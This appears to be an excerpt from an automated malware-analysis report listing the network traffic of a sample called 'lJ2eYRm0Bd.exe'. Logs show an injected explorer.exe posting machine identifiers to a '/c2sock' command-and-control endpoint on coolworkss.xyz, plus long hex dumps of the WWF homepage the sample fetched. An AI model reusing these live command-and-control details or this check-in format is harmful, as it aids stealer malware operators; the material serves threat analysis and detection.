Sep 5, 2023 13:02:26.753834009 CEST	2786	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data
Sep 5, 2023 13:02:27.148981094 CEST	2787	IN	HTTP/1.1 200 OK Date: Tue, 05 Sep 2023 11:02:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=29386pa6c961i2ubv3o9uq80au; expires=Sat, 30 Dec 2023 04:49:06 GMT; Max-Age=9999999; path=/ CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=H99AXUHkTRuSDvlQTMX%2BT3mhqnyHxu%2BrQHmvbc2bwo2E0dqmFf9FV1ptMnvVak8vdbOSlP3XtSUNV7Bm%2BXi40XnyFm0eH83DVQz11n2uq891xIpxi4hioR7ANG6%2FSI%2FEig%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 801dfae19a6c3dd9-MIA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 5, 2023 13:02:27.149017096 CEST	2787	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.4	49743	172.67.195.229	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 5, 2023 13:02:27.463099003 CEST	2788	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 450 Host: coolworkss.xyz
Sep 5, 2023 13:02:27.464889050 CEST	2788	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data
Sep 5, 2023 13:02:27.864033937 CEST	2789	IN	HTTP/1.1 200 OK Date: Tue, 05 Sep 2023 11:02:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=fd9o2go9lihik9r5h7ohm9s18i; expires=Sat, 30 Dec 2023 04:49:06 GMT; Max-Age=9999999; path=/ CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eWQXd0KJvD2gSVe4UIRZORFbOElLUIDAKYZJhPFF9hM91vOnkndvwW%2FT0yoBbO2aM4nnqHBO7XJvllJZnd0jK%2BrfJ594FeOxviafmSExcdlcTShb5VZz%2FF2TghaB8OCdyA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 801dfae60eb58dee-MIA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 5, 2023 13:02:27.864068031 CEST	2789	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49717	104.18.6.142	443	C:\Users\user\Desktop\lJ2eYRm0Bd.exe

Timestamp	Direction	Data
2023-09-05 11:01:20 UTC	OUT	GET / HTTP/1.1 Connection: Keep-Alive Host: wwf.org
2023-09-05 11:01:20 UTC	IN	HTTP/1.1 302 Found Date: Tue, 05 Sep 2023 11:01:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Cache-Control: max-age=0 Strict-Transport-Security: max-age=15552000 Location: https://www.worldwildlife.org?utm_campaign=301-redirects&utm_source=wwf.org&utm_medium=referral&utm_content=wwf.org Expires: Tue, 05 Sep 2023 11:01:20 GMT X-Content-Type-Options: nosniff Set-Cookie: X-Mapping-ekdchbfg=C62F84DC1198965E2E468D7665047166; path=/ X-UA-Compatible: IE=edge CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 801df9433f2c8db4-MIA
2023-09-05 11:01:20 UTC	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49718	104.18.6.94	443	C:\Users\user\Desktop\lJ2eYRm0Bd.exe

Timestamp	kBytes transferred	Direction	Data
2023-09-05 11:01:21 UTC	0	OUT	GET /?utm_campaign=301-redirects&utm_source=wwf.org&utm_medium=referral&utm_content=wwf.org HTTP/1.1 Connection: Keep-Alive Host: www.worldwildlife.org
2023-09-05 11:01:21 UTC	0	IN	HTTP/1.1 200 OK Date: Tue, 05 Sep 2023 11:01:21 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Cache-Control: max-age=0, private, must-revalidate Strict-Transport-Security: max-age=63072000 Referrer-Policy: strict-origin-when-cross-origin X-Permitted-Cross-Domain-Policies: none X-XSS-Protection: 1; mode=block X-XSS-Protection: 1; mode=block X-Request-Id: 7ea93a8d-471b-4f1b-bb57-7c1ad067a415 X-Download-Options: noopen X-Frame-Options: SAMEORIGIN, SAMEORIGIN X-Runtime: 0.012184 X-Content-Type-Options: nosniff X-Content-Type-Options: nosniff X-Powered-By: Phusion Passenger(R) Enterprise Set-Cookie: auth_token=ImRUYk12ajA3WGdSbkpTZlNTTThlRDVNc2VYUEh1VE41RkFJbU1pY0lQMmkzUnlXTHhsQmJ1YXV3T3d2UnFQcEJCZzJWdkZ3YnNTcGZrQUlSSlpEQldBPT0i--29fde9fd58b986288e430b4fa98b67eeaa8ec3ff; path=/; secure Status: 200 OK Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Set-Cookie: _wwf_session=pLFq0NZzDsxxEKWPeuEfaxisbVPGO8pINQyyMX1gwHPOdrfTV8QhiAx8s2w5ACrMMQMXAN7lmleipYwfGrkkPLdq%2BEe0z9Sk3UzRtWGy%2FBK41WRK%2BrAhT%2FOcDISOmLQu6wwCJKcuVkT7xuoqnNQ%3D--%2FLqxUnSf5m4BpFXT--yGamDBNYnAuJL8w8x0Vd1w%3D%3D; path=/; secure; HttpOnly Set-Cookie: __cflb=02DiuGARDpWcJsBwRUA35tzkreDTDgfuNZZ4BBNGXq89z; SameSite=None; Secure; path=/; expires=Wed, 06-Sep-23 10:01:21 GMT; HttpOnly Server: cloudflare
2023-09-05 11:01:21 UTC	2	IN	Data Raw: 43 46 2d 52 41 59 3a 20 38 30 31 64 66 39 34 39 31 39 37 34 38 64 65 65 2d 4d 49 41 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a Data Ascii: CF-RAY: 801df94919748dee-MIAalt-svc: h3=":443"; ma=86400
2023-09-05 11:01:21 UTC	2	IN	Data Raw: 37 61 34 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 57 57 46 20 2d 20 45 6e 64 61 6e 67 65 72 65 64 20 53 70 65 63 69 65 73 20 43 6f 6e 73 65 72 76 61 74 69 6f 6e 20 7c 20 57 6f 72 6c 64 20 57 69 6c 64 6c 69 66 65 20 46 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 61 6c 6c 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d Data Ascii: 7a48<!DOCTYPE html><html class="js" lang="en"><head><title>WWF - Endangered Species Conservation \| World Wildlife Fund</title><meta charset="utf-8"><meta name="robots" content="all"><meta name="viewport" content="width=device-width, initial-scale=
2023-09-05 11:01:21 UTC	3	IN	Data Raw: 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 57 6f 72 6c 64 20 57 69 6c 64 6c 69 66 65 20 46 75 6e 64 20 2d 20 54 68 65 20 6c 65 61 64 69 6e 67 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 20 69 6e 20 77 69 6c 64 6c 69 66 65 20 63 6f 6e 73 65 72 76 61 74 69 6f 6e 20 61 6e 64 20 65 6e 64 61 6e 67 65 72 65 64 20 73 70 65 63 69 65 73 2e 20 4c 65 61 72 6e 20 68 6f 77 20 79 6f 75 20 63 61 6e 20 68 65 6c 70 20 57 57 46 20 6d 61 6b 65 20 61 20 64 69 66 66 65 72 65 6e 63 65 2e 20 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 57 6f 72 6c 64 20 57 69 6c 64 6c 69 66 65 20 46 75 6e 64 20 2d 20 54 68 65 20 6c 65 61 64 69 6e 67 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 20 69 6e 20 Data Ascii: cription" content="World Wildlife Fund - The leading organization in wildlife conservation and endangered species. Learn how you can help WWF make a difference. "><meta property="og:description" content="World Wildlife Fund - The leading organization in
2023-09-05 11:01:21 UTC	4	IN	Data Raw: 70 73 3a 2f 2f 77 77 77 2e 77 6f 72 6c 64 77 69 6c 64 6c 69 66 65 2e 6f 72 67 2f 61 73 73 65 74 73 2f 77 77 66 2d 77 65 62 66 6f 6e 74 2d 66 63 64 37 35 32 36 39 64 61 37 38 34 31 37 31 61 36 30 38 37 38 32 37 35 33 30 64 37 66 37 34 35 37 33 62 36 63 31 35 30 65 37 64 65 30 62 31 62 32 37 64 62 37 32 63 37 33 65 38 62 30 34 61 2e 77 6f 66 66 32 22 20 61 73 3d 22 66 6f 6e 74 22 20 74 79 70 65 3d 22 66 6f 6e 74 2f 77 6f 66 66 32 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 66 38 33 65 37 63 31 65 34 39 34 30 62 31 66 64 33 31 36 31 38 33 64 39 2d 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d Data Ascii: ps://www.worldwildlife.org/assets/wwf-webfont-fcd75269da784171a6087827530d7f74573b6c150e7de0b1b27db72c73e8b04a.woff2" as="font" type="font/woff2" crossorigin><script type="f83e7c1e4940b1fd316183d9-text/javascript">(function(w,d,s,l,i){w[l]=w[l]\|\|[];w[l]
2023-09-05 11:01:21 UTC	6	IN	Data Raw: 20 20 20 20 23 61 72 74 69 63 6c 65 5f 62 6c 6f 63 6b 5f 36 34 35 32 36 63 20 2e 68 6f 6d 65 70 61 67 65 2d 6e 65 77 73 5f 5f 69 6d 61 67 65 2d 70 6c 61 63 65 68 6f 6c 64 65 72 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 33 34 35 37 33 41 3b 0a 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 20 20 23 61 72 74 69 63 6c 65 5f 62 6c 6f 63 6b 5f 37 34 39 36 62 30 20 2e 68 6f 6d 65 70 61 67 65 2d 6e 65 77 73 5f 5f 69 6d 61 67 65 2d 70 6c 61 63 65 68 6f 6c 64 65 72 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 33 34 35 37 33 41 3b 0a 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 Data Ascii: #article_block_64526c .homepage-news__image-placeholder { background-color: #34573A; } </style><style> #article_block_7496b0 .homepage-news__image-placeholder { background-color: #34573A; } </style><style> </style><sty
2023-09-05 11:01:21 UTC	7	IN	Data Raw: 74 5f 62 6c 6f 63 6b 5f 61 31 35 32 61 33 20 2e 68 6f 6d 65 70 61 67 65 2d 6c 67 2d 63 61 6d 70 61 69 67 6e 2d 74 65 78 74 20 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 23 6c 61 72 67 65 5f 63 61 6d 70 61 69 67 6e 5f 74 65 78 74 5f 62 6c 6f 63 6b 5f 61 31 35 32 61 33 20 2e 68 6f 6d 65 70 61 67 65 2d 6c 67 2d 63 61 6d 70 61 69 67 6e 2d 74 65 78 74 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 20 20 23 63 61 6d 70 61 69 67 6e 5f 62 6c 6f 63 6b 5f 66 38 31 39 63 35 20 Data Ascii: t_block_a152a3 .homepage-lg-campaign-text { background-color: #ffffff; } #large_campaign_text_block_a152a3 .homepage-lg-campaign-text { color: #000000; } </style><style> </style><style> #campaign_block_f819c5
2023-09-05 11:01:21 UTC	8	IN	Data Raw: 6c 3f 69 64 3d 47 54 4d 2d 57 39 38 4e 38 43 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 30 22 20 77 69 64 74 68 3d 22 30 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 22 3e 3c 2f 69 66 72 61 6d 65 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 66 38 33 65 37 63 31 65 34 39 34 30 62 31 66 64 33 31 36 31 38 33 64 39 2d 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 66 62 2d 72 6f 6f 74 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 3c 64 Data Ascii: l?id=GTM-W98N8C" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript><script type="f83e7c1e4940b1fd316183d9-text/javascript"></script><div id="fb-root"></div><div id="header"><div class="wrapper"><d
2023-09-05 11:01:21 UTC	10	IN	Data Raw: 6f 77 7c 55 70 70 65 72 20 4e 61 76 20 43 6c 69 63 6b 7c 44 6f 6e 61 74 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 72 6f 74 65 63 74 2e 77 6f 72 6c 64 77 69 6c 64 6c 69 66 65 2e 6f 72 67 2f 70 61 67 65 2f 35 32 37 31 37 2f 64 6f 6e 61 74 65 2f 31 3f 65 6e 5f 6f 67 5f 73 6f 75 72 63 65 3d 57 65 62 5f 44 6f 6e 61 74 69 6f 6e 26 61 6d 70 3b 65 61 2e 74 72 61 63 6b 69 6e 67 2e 69 64 3d 57 65 62 5f 54 6f 70 6e 61 76 26 61 6d 70 3b 73 75 70 70 6f 72 74 65 72 2e 61 70 70 65 61 6c 43 6f 64 65 3d 41 57 45 32 34 30 32 4f 51 31 38 32 39 39 41 30 31 31 37 39 52 58 22 3e 0a 44 6f 6e 61 74 65 0a 3c 2f 61 3e 20 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 61 63 74 69 6f 6e 20 61 63 74 69 6f Data Ascii: ow\|Upper Nav Click\|Donate" href="https://protect.worldwildlife.org/page/52717/donate/1?en_og_source=Web_Donation&ea.tracking.id=Web_Topnav&supporter.appealCode=AWE2402OQ18299A01179RX">Donate</a> </li><li class="nav-item"><a class="action actio
2023-09-05 11:01:21 UTC	11	IN	Data Raw: 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 69 6e 6c 69 6e 65 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 63 78 22 20 76 61 6c 75 65 3d 22 30 30 33 34 34 33 33 37 34 33 39 36 33 36 39 32 37 37 36 32 34 3a 76 33 6e 72 61 71 68 6d 65 79 6b 22 20 2f 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 69 65 22 20 76 61 6c 75 65 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 6d 6f 62 69 6c 65 2d 71 22 3e 53 65 61 72 63 68 3c 2f 6c 61 62 65 6c 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 6e 61 6d 65 3d 22 78 22 20 69 64 3d 22 6d 6f 62 69 6c 65 2d 71 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 54 79 70 65 20 74 6f 20 73 65 61 72 63 Data Ascii: <div class="form-inline"><input type="hidden" name="cx" value="003443374396369277624:v3nraqhmeyk" /><input type="hidden" name="ie" value="UTF-8" /><label for="mobile-q">Search</label><input type="text" name="x" id="mobile-q" placeholder="Type to searc
2023-09-05 11:01:21 UTC	12	IN	Data Raw: 65 22 20 64 61 74 61 2d 74 72 61 63 6b 2d 65 76 65 6e 74 3d 22 48 6f 6d 65 70 61 67 65 73 20 53 68 6f 77 7c 55 70 70 65 72 20 4e 61 76 20 43 6c 69 63 6b 7c 54 6f 67 67 6c 65 20 44 6f 6e 61 74 65 20 44 72 6f 70 64 6f 77 6e 20 4c 69 6e 6b 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 63 72 65 65 6e 2d 72 65 61 64 65 72 22 3e 54 6f 67 67 6c 65 20 44 6f 6e 61 74 65 20 62 75 74 74 6f 6e 20 3c 2f 73 70 61 6e 3e 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 20 32 34 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 73 76 67 2d 69 63 6f 6e 20 2d 6f 70 65 6e 22 3e 0a Data Ascii: e" data-track-event="Homepages Show\|Upper Nav Click\|Toggle Donate Dropdown Links"><span class="screen-reader">Toggle Donate button </span><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" aria-hidden="true" class="svg-icon -open">
2023-09-05 11:01:21 UTC	14	IN	Data Raw: 3b 73 20 4e 61 6d 65 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 20 3c 2f 6c 69 3e 0a 3c 6c 69 3e 0a 3c 61 20 64 61 74 61 2d 74 72 61 63 6b 2d 65 76 65 6e 74 3d 22 48 6f 6d 65 70 61 67 65 73 20 53 68 6f 77 7c 55 70 70 65 72 20 4e 61 76 20 43 6c 69 63 6b 7c 44 6f 6e 61 74 65 20 2d 20 52 65 6e 65 77 20 79 6f 75 72 20 4d 65 6d 62 65 72 73 68 69 70 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 72 6f 74 65 63 74 2e 77 6f 72 6c 64 77 69 6c 64 6c 69 66 65 2e 6f 72 67 2f 70 61 67 65 2f 35 33 30 38 32 2f 64 6f 6e 61 74 65 2f 31 3f 65 6e 5f 6f 67 5f 73 6f 75 72 63 65 3d 57 65 62 5f 44 6f 6e 61 74 69 6f 6e 26 61 6d 70 3b 65 61 2e 74 72 61 63 6b 69 6e 67 2e 69 64 3d 57 65 62 5f 54 6f 70 6e 61 76 26 61 6d 70 3b 73 75 70 70 6f 72 74 65 72 2e 61 70 70 65 61 6c 43 6f 64 65 Data Ascii: ;s Name</span></a> </li><li><a data-track-event="Homepages Show\|Upper Nav Click\|Donate - Renew your Membership" href="https://protect.worldwildlife.org/page/53082/donate/1?en_og_source=Web_Donation&ea.tracking.id=Web_Topnav&supporter.appealCode
2023-09-05 11:01:21 UTC	15	IN	Data Raw: 76 2d 31 2d 70 61 6e 65 6c 2d 37 31 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 20 64 61 74 61 2d 74 72 61 63 6b 2d 65 76 65 6e 74 3d 22 48 6f 6d 65 70 61 67 65 73 20 53 68 6f 77 7c 55 70 70 65 72 20 4e 61 76 20 43 6c 69 63 6b 7c 54 6f 67 67 6c 65 20 41 64 6f 70 74 20 44 72 6f 70 64 6f 77 6e 20 4c 69 6e 6b 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 63 72 65 65 6e 2d 72 65 61 64 65 72 22 3e 54 6f 67 67 6c 65 20 41 64 6f 70 74 20 62 75 74 74 6f 6e 20 3c 2f 73 70 61 6e 3e 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 20 32 34 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d Data Ascii: v-1-panel-71" aria-expanded="false" data-track-event="Homepages Show\|Upper Nav Click\|Toggle Adopt Dropdown Links"><span class="screen-reader">Toggle Adopt button </span><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" aria-hidden=
2023-09-05 11:01:21 UTC	16	IN	Data Raw: 76 20 43 6c 69 63 6b 7c 41 64 6f 70 74 20 2d 20 4d 6f 72 65 20 47 69 66 74 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 66 74 73 2e 77 6f 72 6c 64 77 69 6c 64 6c 69 66 65 2e 6f 72 67 2f 67 69 66 74 2d 63 65 6e 74 65 72 2f 67 69 66 74 73 2f 47 69 66 74 73 2d 61 6e 64 2d 41 63 63 65 73 73 6f 72 69 65 73 2e 61 73 70 78 3f 73 63 3d 41 57 59 32 32 30 39 4f 51 31 38 33 33 35 41 30 32 30 37 33 52 58 26 61 6d 70 3b 73 5f 73 75 62 73 72 63 3d 74 6f 70 6e 61 76 22 3e 0a 3c 73 70 61 6e 3e 4d 6f 72 65 20 47 69 66 74 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 20 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 Data Ascii: v Click\|Adopt - More Gifts" href="https://gifts.worldwildlife.org/gift-center/gifts/Gifts-and-Accessories.aspx?sc=AWY2209OQ18335A02073RX&s_subsrc=topnav"><span>More Gifts</span></a> </li></ul></div></div></div></li></ul></div><div class="nav
2023-09-05 11:01:21 UTC	18	IN	Data Raw: 77 2d 61 6c 6c 22 20 64 61 74 61 2d 74 72 61 63 6b 2d 65 76 65 6e 74 3d 22 48 6f 6d 65 70 61 67 65 73 20 53 68 6f 77 7c 55 70 70 65 72 20 4e 61 76 20 43 6c 69 63 6b 7c 4f 75 72 20 57 6f 72 6b 20 2d 20 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f 75 74 20 6f 75 72 20 69 6d 70 61 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 6f 72 6c 64 77 69 6c 64 6c 69 66 65 2e 6f 72 67 2f 69 6e 69 74 69 61 74 69 76 65 73 22 3e 0a 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f 75 74 20 6f 75 72 20 69 6d 70 61 63 74 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 20 32 34 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 61 72 69 61 2d 68 69 64 64 65 Data Ascii: w-all" data-track-event="Homepages Show\|Upper Nav Click\|Our Work - Learn more about our impact" href="https://www.worldwildlife.org/initiatives">Learn more about our impact<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" aria-hidde
2023-09-05 11:01:21 UTC	19	IN	Data Raw: 2d 65 76 65 6e 74 3d 22 48 6f 6d 65 70 61 67 65 73 20 53 68 6f 77 7c 55 70 70 65 72 20 4e 61 76 20 43 6c 69 63 6b 7c 4f 75 72 20 57 6f 72 6b 20 2d 20 53 75 73 74 61 69 6e 61 62 69 6c 69 74 79 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 6f 72 6c 64 77 69 6c 64 6c 69 66 65 2e 6f 72 67 2f 74 6f 70 69 63 73 2f 73 75 73 74 61 69 6e 61 62 69 6c 69 74 79 22 3e 53 75 73 74 61 69 6e 61 62 69 6c 69 74 79 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 2d 67 72 6f 75 70 20 70 72 69 6d 61 72 79 22 3e 0a 3c 75 6c 3e 0a 3c 6c 69 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6e 61 76 2d 68 65 61 64 65 72 22 3e 48 6f 77 20 77 65 20 77 6f 72 6b 3c 2f 73 70 61 6e 3e 0a 3c 2f 6c 69 3e 0a 3c 6c Data Ascii: -event="Homepages Show\|Upper Nav Click\|Our Work - Sustainability" href="https://www.worldwildlife.org/topics/sustainability">Sustainability</a></li></ul></div><div class="nav-group primary"><ul><li><span class="nav-header">How we work</span></li><l
2023-09-05 11:01:21 UTC	20	IN	Data Raw: 22 48 6f 6d 65 70 61 67 65 73 20 53 68 6f 77 7c 55 70 70 65 72 20 4e 61 76 20 43 6c 69 63 6b 7c 4f 75 72 20 57 6f 72 6b 20 2d 20 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f 75 74 20 6f 75 72 20 69 6d 70 61 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 6f 72 6c 64 77 69 6c 64 6c 69 66 65 2e 6f 72 67 2f 69 6e 69 74 69 61 74 69 76 65 73 22 3e 0a 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f 75 74 20 6f 75 72 20 69 6d 70 61 63 74 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 20 32 34 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 73 76 67 2d 69 63 6f 6e Data Ascii: "Homepages Show\|Upper Nav 